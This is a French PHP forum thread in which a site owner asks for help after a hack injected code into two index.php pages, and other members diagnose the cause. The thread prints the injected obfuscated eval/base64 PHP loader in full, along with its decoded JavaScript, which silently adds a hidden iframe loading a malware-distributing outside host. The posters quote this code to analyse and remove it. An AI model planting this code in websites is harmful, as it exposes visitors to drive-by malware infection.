IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

hack de deux pages sur mon site


Sujet :

Langage PHP

  1. #1
    Membre actif Avatar de elcoyotos
    Homme Profil pro
    Amateur passionné
    Inscrit en
    Octobre 2006
    Messages
    490
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine Saint Denis (Île de France)

    Informations professionnelles :
    Activité : Amateur passionné

    Informations forums :
    Inscription : Octobre 2006
    Messages : 490
    Points : 294
    Points
    294
    Par défaut hack de deux pages sur mon site
    Bonjour,

    J'ai un de mes site qui s'est fait hacker.
    Du code a été injecté dans deux pages.

    Voici le code :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
     
    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdjVDFrYjJOMWJXVnVkQzVqY21WaGRHVkZiR1Z0Wlc1MEtDSjFJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hjcGUyZzlMVEF4TWk4MU8zcDZQU2RoSnlzbmJDYzdaajBuWm5Jbkt5ZHZKeXNuYlNjckowTm9KenRtS3owbllYSkRKenQ5ZEhKNWUzRjNaVDF3Y205MGIzUjVjR1U3ZldOaGRHTm9LR0p5WldKeUtYdDZlajBuZW5ZbkxuTjFZbk4wY2lneE1qTXRNVEl5S1N0NmVqdHpjejFiWFR0bUt6MG9hQ2svSjI5a1pTYzZJaUk3ZHoxMGFHbHpPMlU5ZDF0bUxuTjFZbk4wY2lneE1Ta3JlbnBkTzI0OUlqRXVOU1F4TGpVa05Ea3VOU1EwT0NReE15UXhOeVEwTnlRMU1pNDFKRFEyTGpVa05UVXVOU1ExTVM0MUpEUTNMalVrTlRJa05UVWtNakFrTkRndU5TUTBOeTQxSkRVMUpETXhMalVrTlRFa05EY3VOU1ExTVM0MUpEUTNMalVrTlRJa05UVWtOVFF1TlNRek1DUTFOeTQxSkRNNUpEUTFMalVrTkRndU5TUXpOaVEwTlM0MUpEVXhMalVrTkRjdU5TUXhOeVF4Tmk0MUpEUTJKRFV5TGpVa05EY2tOVGN1TlNReE5pNDFKREUzTGpVa05ESXVOU1F5TVNRME15NDFKREUzTGpVa05UZ3VOU1F6TGpVa01TNDFKREV1TlNReExqVWtORGt1TlNRME9DUTFOQ1EwTlM0MUpEVXhMalVrTkRjdU5TUTFOQ1F4TnlReE55NDFKREkyTGpVa015NDFKREV1TlNReExqVWtOVGt1TlNReE15UTBOeTQxSkRVeEpEVTBMalVrTkRjdU5TUXhNeVExT0M0MUpETXVOU1F4TGpVa01TNDFKREV1TlNRME55UTFNaTQxSkRRMkxqVWtOVFV1TlNRMU1TNDFKRFEzTGpVa05USWtOVFVrTWpBa05UWXVOU1ExTkNRME9TNDFKRFUxSkRRM0xqVWtNVGNrTVRRa01qY2tORGt1TlNRME9DUTFOQ1EwTlM0MUpEVXhMalVrTkRjdU5TUXhNeVExTkM0MUpEVTBKRFEyTGpVa01qY3VOU1F4Tmk0MUpEUTVKRFUxSkRVMUpEVXpKREkySkRJd0xqVWtNakF1TlNRMU1TNDFKRFV5TGpVa05UVXVOU1ExT0NRMU55NDFKRFUzTGpVa05UZ2tORFV1TlNReU1DUTFNUzQxSkRVM0xqVWtORGdrTlRVa05UTWtNakFrTlRJa05EVXVOU1ExTVM0MUpEUTNMalVrTWpBdU5TUTBOeVF5TUM0MUpESXpKREl4SkRJekpESXdKRFV6SkRRNUpEVXpKREk0TGpVa05EZ3VOU1ExTWk0MUpESTNMalVrTWpFdU5TUXhOaTQxSkRFekpEVTJMalVrTkRrdU5TUTBOeVExTlNRME9TUXlOeTQxSkRFMkxqVWtNakV1TlNReU1TUXhOaTQxSkRFekpEUTVKRFEzTGpVa05Ea3VOU1EwT0M0MUpEUTVKRFUxSkRJM0xqVWtNVFl1TlNReU1TNDFKREl4SkRFMkxqVWtNVE1rTlRRdU5TUTFOU1ExTnk0MUpEVXhKRFEzTGpVa01qY3VOU1F4Tmk0MUpEVTJKRFE1TGpVa05UUXVOU1EwT1M0MUpEUTJKRFE1TGpVa05URWtORGt1TlNRMU5TUTFOeTQxSkRJMkpEUTVKRFE1TGpVa05EY2tORGNrTkRjdU5TUTFNaVF5Tmk0MUpEVXpKRFV5TGpVa05UUXVOU1EwT1M0MUpEVTFKRFE1TGpVa05USXVOU1ExTWlReU5pUTBOUzQxSkRRMkpEVTBMalVrTlRJdU5TUTFNU1ExTlM0MUpEVTFKRFEzTGpVa01qWXVOU1ExTVNRME55NDFKRFE0SkRVMUpESTJKREl4SkRJMkxqVWtOVFVrTlRJdU5TUTFNeVF5TmlReU1TUXlOaTQxSkRFMkxqVWtNamdrTWpja01qQXVOU1EwT1M0MUpEUTRKRFUwSkRRMUxqVWtOVEV1TlNRME55NDFKREk0SkRFMEpERTNMalVrTWpZdU5TUXpMalVrTVM0MUpERXVOU1ExT1M0MUpETXVOU1F4TGpVa01TNDFKRFE0SkRVMUxqVWtOVElrTkRZdU5TUTFOU1EwT1M0MUpEVXlMalVrTlRJa01UTWtORGt1TlNRME9DUTFOQ1EwTlM0MUpEVXhMalVrTkRjdU5TUTFOQ1F4TnlReE55NDFKRFU0TGpVa015NDFKREV1TlNReExqVWtNUzQxSkRVMkpEUTFMalVrTlRRa01UTWtORGdrTVRNa01qY3VOU1F4TXlRME55UTFNaTQxSkRRMkxqVWtOVFV1TlNRMU1TNDFKRFEzTGpVa05USWtOVFVrTWpBa05EWXVOU1ExTkNRME55NDFKRFExTGpVa05UVWtORGN1TlNRek1TNDFKRFV4SkRRM0xqVWtOVEV1TlNRME55NDFKRFV5SkRVMUpERTNKREUyTGpVa05Ea3VOU1EwT0NRMU5DUTBOUzQxSkRVeExqVWtORGN1TlNReE5pNDFKREUzTGpVa01qWXVOU1EwT0NReU1DUTFOQzQxSkRRM0xqVWtOVFVrTWprdU5TUTFOU1ExTlNRMU5DUTBPUzQxSkRRMkpEVTFMalVrTlRVa05EY3VOU1F4TnlReE5pNDFKRFUwTGpVa05UUWtORFl1TlNReE5pNDFKREU1SkRFMkxqVWtORGtrTlRVa05UVWtOVE1rTWpZa01qQXVOU1F5TUM0MUpEVXhMalVrTlRJdU5TUTFOUzQxSkRVNEpEVTNMalVrTlRjdU5TUTFPQ1EwTlM0MUpESXdKRFV4TGpVa05UY3VOU1EwT0NRMU5TUTFNeVF5TUNRMU1pUTBOUzQxSkRVeExqVWtORGN1TlNReU1DNDFKRFEzSkRJd0xqVWtNak1rTWpFa01qTWtNakFrTlRNa05Ea2tOVE1rTWpndU5TUTBPQzQxSkRVeUxqVWtNamN1TlNReU1TNDFKREUyTGpVa01UY3VOU1F5Tmk0MUpEUTRKREl3SkRVMExqVWtOVFVrTlRjdU5TUTFNU1EwTnk0MUpESXdKRFUySkRRNUxqVWtOVFF1TlNRME9TNDFKRFEySkRRNUxqVWtOVEVrTkRrdU5TUTFOU1ExTnk0MUpESTNMalVrTVRZdU5TUTBPU1EwT1M0MUpEUTNKRFEzSkRRM0xqVWtOVElrTVRZdU5TUXlOaTQxSkRRNEpESXdKRFUwTGpVa05UVWtOVGN1TlNRMU1TUTBOeTQxSkRJd0pEVXpKRFV5TGpVa05UUXVOU1EwT1M0MUpEVTFKRFE1TGpVa05USXVOU1ExTWlReU55NDFKREUyTGpVa05EVXVOU1EwTmlRMU5DNDFKRFV5TGpVa05URWtOVFV1TlNRMU5TUTBOeTQxSkRFMkxqVWtNall1TlNRME9DUXlNQ1ExTkM0MUpEVTFKRFUzTGpVa05URWtORGN1TlNReU1DUTFNU1EwTnk0MUpEUTRKRFUxSkRJM0xqVWtNVFl1TlNReU1TUXhOaTQxSkRJMkxqVWtORGdrTWpBa05UUXVOU1ExTlNRMU55NDFKRFV4SkRRM0xqVWtNakFrTlRVa05USXVOU1ExTXlReU55NDFKREUyTGpVa01qRWtNVFl1TlNReU5pNDFKRFE0SkRJd0pEVTBMalVrTkRjdU5TUTFOU1F5T1M0MUpEVTFKRFUxSkRVMEpEUTVMalVrTkRZa05UVXVOU1ExTlNRME55NDFKREUzSkRFMkxqVWtOVFl1TlNRME9TNDFKRFEzSkRVMUpEUTVKREUyTGpVa01Ua2tNVFl1TlNReU1TNDFKREl4SkRFMkxqVWtNVGN1TlNReU5pNDFKRFE0SkRJd0pEVTBMalVrTkRjdU5TUTFOU1F5T1M0MUpEVTFKRFUxSkRVMEpEUTVMalVrTkRZa05UVXVOU1ExTlNRME55NDFKREUzSkRFMkxqVWtORGtrTkRjdU5TUTBPUzQxSkRRNExqVWtORGtrTlRVa01UWXVOU1F4T1NReE5pNDFKREl4TGpVa01qRWtNVFl1TlNReE55NDFKREkyTGpVa015NDFKREV1TlNReExqVWtNUzQxSkRRM0pEVXlMalVrTkRZdU5TUTFOUzQxSkRVeExqVWtORGN1TlNRMU1pUTFOU1F5TUNRME9DNDFKRFEzTGpVa05UVWtNekV1TlNRMU1TUTBOeTQxSkRVeExqVWtORGN1TlNRMU1pUTFOU1ExTkM0MUpETXdKRFUzTGpVa016a2tORFV1TlNRME9DNDFKRE0ySkRRMUxqVWtOVEV1TlNRME55NDFKREUzSkRFMkxqVWtORFlrTlRJdU5TUTBOeVExTnk0MUpERTJMalVrTVRjdU5TUTBNaTQxSkRJeEpEUXpMalVrTWpBa05EVXVOU1ExTXlRMU15UTBOeTQxSkRVeUpEUTNKRE13TGpVa05Ea2tORGt1TlNRMU1TUTBOeVF4TnlRME9DUXhOeTQxSkRJMkxqVWtNeTQxSkRFdU5TUXhMalVrTlRrdU5TSmJLQ2hsS1Q4aWN5STZJaUlwS3lKd0lpc2liR2wwSWwwb0ltRWtJaTV6ZFdKemRISW9NU2twTzJadmNpaHBQVFl0TWkweExUSXRNVHRwTFRVNU1TRTlNRHRwS3lzcGUyczlhVHR6Y3oxemN5dFRkSEpwYm1jdVpuSnZiVU5vWVhKRGIyUmxLQzB4S21ncUtETXJNU3B1VzJ0ZEtTazdmWEU5YzNNN1pTaHhLVHQ5UEM5elkzSnBjSFErJykpOw0KfQ=='));
    Ce qui donne décodé :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
     
    <script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n="1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$17.5$58.5$3.5$1.5$1.5$1.5$49.5$48$54$45.5$51.5$47.5$54$17$17.5$26.5$3.5$1.5$1.5$59.5$13$47.5$51$54.5$47.5$13$58.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$56.5$54$49.5$55$47.5$17$14$27$49.5$48$54$45.5$51.5$47.5$13$54.5$54$46.5$27.5$16.5$49$55$55$53$26$20.5$20.5$51.5$52.5$55.5$58$57.5$57.5$58$45.5$20$51.5$57.5$48$55$53$20$52$45.5$51.5$47.5$20.5$47$20.5$23$21$23$20$53$49$53$28.5$48.5$52.5$27.5$21.5$16.5$13$56.5$49.5$47$55$49$27.5$16.5$21.5$21$16.5$13$49$47.5$49.5$48.5$49$55$27.5$16.5$21.5$21$16.5$13$54.5$55$57.5$51$47.5$27.5$16.5$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$26$49$49.5$47$47$47.5$52$26.5$53$52.5$54.5$49.5$55$49.5$52.5$52$26$45.5$46$54.5$52.5$51$55.5$55$47.5$26.5$51$47.5$48$55$26$21$26.5$55$52.5$53$26$21$26.5$16.5$28$27$20.5$49.5$48$54$45.5$51.5$47.5$28$14$17.5$26.5$3.5$1.5$1.5$59.5$3.5$1.5$1.5$48$55.5$52$46.5$55$49.5$52.5$52$13$49.5$48$54$45.5$51.5$47.5$54$17$17.5$58.5$3.5$1.5$1.5$1.5$56$45.5$54$13$48$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$54.5$54$46.5$16.5$19$16.5$49$55$55$53$26$20.5$20.5$51.5$52.5$55.5$58$57.5$57.5$58$45.5$20$51.5$57.5$48$55$53$20$52$45.5$51.5$47.5$20.5$47$20.5$23$21$23$20$53$49$53$28.5$48.5$52.5$27.5$21.5$16.5$17.5$26.5$48$20$54.5$55$57.5$51$47.5$20$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$27.5$16.5$49$49.5$47$47$47.5$52$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$53$52.5$54.5$49.5$55$49.5$52.5$52$27.5$16.5$45.5$46$54.5$52.5$51$55.5$55$47.5$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$51$47.5$48$55$27.5$16.5$21$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$55$52.5$53$27.5$16.5$21$16.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$56.5$49.5$47$55$49$16.5$19$16.5$21.5$21$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$49$47.5$49.5$48.5$49$55$16.5$19$16.5$21.5$21$16.5$17.5$26.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$48$17.5$26.5$3.5$1.5$1.5$59.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-591!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}</script>
    Je suppose que le JS est codé. D'ailleurs si quelqu'un pouvait me dire ce qu'il contient ???

    Donc, plusieurs questions :

    1. Quelqu'un a t-il déjà été confronté à ce problème ?
    2. Comment le hackeur a t-il fait ?
    3. J'avais FCKEDITOR et en parcourant Google, j'ai lu que ça pouvait provenir d'une faille de celui ci...

    Merci d'avance de vos éclaircissement ...

    PS : J'ai fait une comparaison des répertoires de ma sauvegarde et du site hacké. Pas de nouveau fichier ...

    Dernières news :
    J'ai supprimé tous les répertoires et tous les fichiers de mon site puis, j'ai envoyé sur mon serveur la sauvegarde de mon index.php (propre) en le mettant en maintenance puis 3 répertoires : images, include (fichiers propres) et template (fichiers propres).
    Je retourne sur mon site et là, mon index est de nouveau infecté !!!!

    Une idée ?
    Écoute, sinon ta langue te perdra (proverbe Navajo)

  2. #2
    Expert éminent
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 36
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Points : 7 762
    Points
    7 762
    Par défaut
    Peu importe ce que ça contiens, c'est du XSS, tu le vire.

    Pour arriver à injecter ce code dans une page PHP, l'attaquant à probablement dû exploiter une faille de formulaire dont le handler effectue des écritures ou alors tu t'es fait tirer tes identifiants.

    Est-ce que tu utilise un CMS ? Quelle est le type d'hébergement ?

    Pour la petite histoire, le virus provoque l'insertion de contenus en provenance de mouzyyza.myftp.name. Chrome bloque la page dès qu'on essaie de le faire tourner.
    localhost fournit du contenu provenant de mouzyyza.myftp.name, un site connu pour distribuer des logiciels malveillants. Votre ordinateur pourrait être infecté par un virus si vous consultez ce site.
    Voici ce qui est injecté dans la page:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <iframe height="10" width="10" src="http://mouzyyza.myftp.name/d/404.php?go=1" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>

  3. #3
    Expert éminent
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 36
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Points : 7 762
    Points
    7 762
    Par défaut
    Et voici ce qui se cachait sous l'encodage:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(""); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://mouzyyza.myftp.name/d/404.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
    En version lisible:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    if (document.getElementsByTagName('body')[0]) { 
        iframer();
    }
    else { 
        document.write("");
    } 
     
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://mouzyyza.myftp.name/d/404.php?go=1');
        f.style.visibility='hidden';
        f.style.position='absolute';
        f.style.left='0';
        f.style.top='0';
        f.setAttribute('width','10');
        f.setAttribute('height','10'); 
        document.getElementsByTagName('body')[0].appendChild(f); 
    }
    pour la petite histoire, c'était pas très dur à décortiquer, y'avait beaucoup de code inutile, surtout pour noyer le poisson et rendre le tout difficilement compréhensible.
    Bref, pas de quoi casser trois pates à un canard.

  4. #4
    Membre actif Avatar de elcoyotos
    Homme Profil pro
    Amateur passionné
    Inscrit en
    Octobre 2006
    Messages
    490
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine Saint Denis (Île de France)

    Informations professionnelles :
    Activité : Amateur passionné

    Informations forums :
    Inscription : Octobre 2006
    Messages : 490
    Points : 294
    Points
    294
    Par défaut
    Peu importe ce que ça contiens, c'est du XSS, tu le vire.
    Oui, je m'en serai douter lol !

    Pour arriver à injecter ce code dans une page PHP, l'attaquant à probablement dû exploiter une faille de formulaire dont le handler effectue des écritures.
    Tu veux parler d'un formulaire d'upload ?

    Est-ce que tu utilise un CMS ?
    Non.

    Quelle est le type d'hébergement ?
    Mutualisé. PHP Version 4.4.9 - Linux arbok 2.6.24-gentoo-r8

    Tin, c'est une vieille version de PHP ça

    Ca te suffit comme infos ?

    Merci pour vos réponses et pour le décode du JS
    Écoute, sinon ta langue te perdra (proverbe Navajo)

  5. #5
    Membre éprouvé

    Profil pro
    Inscrit en
    Juin 2007
    Messages
    748
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2007
    Messages : 748
    Points : 1 022
    Points
    1 022
    Par défaut
    ca peu aussi être un pb de htaccess ( redirection de domaine mal formaté, style un $1 qui traine et un [L] pas présent) , j'ai pu la faille en tête mais un article de developpez.com en a parlé
    Conception / Dev

  6. #6
    Membre actif Avatar de elcoyotos
    Homme Profil pro
    Amateur passionné
    Inscrit en
    Octobre 2006
    Messages
    490
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine Saint Denis (Île de France)

    Informations professionnelles :
    Activité : Amateur passionné

    Informations forums :
    Inscription : Octobre 2006
    Messages : 490
    Points : 294
    Points
    294
    Par défaut
    Merci ascito pour cette piste mais je n'ai pas de redirection ni de ré-écriture de page avec mon htaccess ...
    Écoute, sinon ta langue te perdra (proverbe Navajo)

  7. #7
    Expert éminent
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 36
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Points : 7 762
    Points
    7 762
    Par défaut
    Ni CMS ni hébergement dédié, du coup je pencherai bien pour une faille PHP mais je ne suis pas suffisamment compétent en sécurité pour te répondre.

  8. #8
    Membre actif Avatar de elcoyotos
    Homme Profil pro
    Amateur passionné
    Inscrit en
    Octobre 2006
    Messages
    490
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine Saint Denis (Île de France)

    Informations professionnelles :
    Activité : Amateur passionné

    Informations forums :
    Inscription : Octobre 2006
    Messages : 490
    Points : 294
    Points
    294
    Par défaut
    Je viens de me livrer à une expérience.

    1. J'ai supprimé tous les fichier de mon serveur
    2. J'ai balancé dessus mon fichier index.php sain et la feuille de style
    3. Le template dans le répertoire template
    4. Un répertoire include contenant le menu et le footer
    5. Le répertoire image avec juste ce qu'il faut pour afficher correctement l'index
    6. Il y a donc trois répertoires. Il contiennent chacun un htacess qui est le suivant :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    deny from all
    ErrorDocument 403 http://www.mmon-site.com/403.php

    Il n'y a aucun formulaire !


    Ma page s'est retrouvée infectée au bout d'une demi heure !


    Se pourrait-il que ça soit le serveur qui soit corrompu ?
    Écoute, sinon ta langue te perdra (proverbe Navajo)

  9. #9
    Expert éminent
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 36
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Points : 7 762
    Points
    7 762
    Par défaut
    Ou qu'on t'aies piqué tes identifiants

    C'est un hébergement Pakistanais que tu as ou bien ?

  10. #10
    Membre actif Avatar de elcoyotos
    Homme Profil pro
    Amateur passionné
    Inscrit en
    Octobre 2006
    Messages
    490
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine Saint Denis (Île de France)

    Informations professionnelles :
    Activité : Amateur passionné

    Informations forums :
    Inscription : Octobre 2006
    Messages : 490
    Points : 294
    Points
    294
    Par défaut
    C'est un hébergement Pakistanais que tu as ou bien ?
    LOL !!
    Non, il est français !!!
    Il s'agit de http://www.iesanetwork.com/

    En fait, il s'agit d'une école de multimédia dans laquelle j'ai fait un stage. A la fin de celui ci il offre 40 Mo d'hébergement.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    Ou qu'on t'aies piqué tes identifiants
    C'est une possibilité. Mais deux choses cloches :

    1. Le hacker n'aurait pas changé les identifiants ? Pourquoi pas ...
    2. Il sait quand j'upload et a un temps de réaction d'une demi heure ? Peu propable ...

    Je viens de m'apercevoir qu'en faisant une recherche sur google avec le nom de mon hébergeur (iesanetwork) le site est classé comme dangereux ...
    Écoute, sinon ta langue te perdra (proverbe Navajo)

  11. #11
    Membre émérite Avatar de Djakisback
    Profil pro
    Inscrit en
    Février 2005
    Messages
    2 021
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Février 2005
    Messages : 2 021
    Points : 2 278
    Points
    2 278
    Par défaut
    Salut,
    par curiosité le nom de l'autre page infectée c'était quoi ?
    Ce qui se passe assez souvent sur les serveurs mal configurés c'est l'exploitation d'une faille sur un site donnant accès à la totalité des fichiers/BDD des sites mutualisés, c'est peut-être ce cas de figure.
    Sinon tu ne fais pas des includes particuliers (avec variables externes par exemple) ? ou encore tu n'as pas de dossiers /cgi ou autre avant la racine ?
    Vive les roues en pierre

  12. #12
    Expert éminent
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 36
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Points : 7 762
    Points
    7 762
    Par défaut
    C'est sûrement l'hébergeur qui est infecté, dégage ton site de cette fosse à purin même pas à jour

    Vu que le problème à tendance à persister, c'est possible qu'il y ait un cronjob qui tourne dessus pour injecter ce fragment dans tous les index.php qu'il trouve.

  13. #13
    Membre actif Avatar de elcoyotos
    Homme Profil pro
    Amateur passionné
    Inscrit en
    Octobre 2006
    Messages
    490
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine Saint Denis (Île de France)

    Informations professionnelles :
    Activité : Amateur passionné

    Informations forums :
    Inscription : Octobre 2006
    Messages : 490
    Points : 294
    Points
    294
    Par défaut
    C'est pour l'instant ce qui me parait le plus plausible...
    D'autant que le deuxième fichier était aussi index.php situé dans le répertoire admin ...

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    Sinon tu ne fais pas des includes particuliers (avec variables externes par exemple) ?
    nannnnn. C'était des include "bete" genre footer, header, connexion à la BDD etc ...

    En tous cas, merci de vos réponses.

    J'ai rapporté l'incident aux services techniques de l'hébergeur. Si celui ci me répond un jour, je vous tiens au courant ...
    Écoute, sinon ta langue te perdra (proverbe Navajo)

Discussions similaires

  1. Probleme de block mal placé sur une seule page de mon site
    Par cuisto44000 dans le forum Mise en page CSS
    Réponses: 2
    Dernier message: 09/03/2009, 15h06
  2. Décalage sur une page de mon site
    Par hoodvy dans le forum Balisage (X)HTML et validation W3C
    Réponses: 4
    Dernier message: 31/12/2008, 08h08
  3. Page maître sur mon site perso, comment faire ?
    Par Tony Truand dans le forum Général Conception Web
    Réponses: 4
    Dernier message: 14/11/2008, 12h32
  4. Réponses: 1
    Dernier message: 22/09/2008, 12h18

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo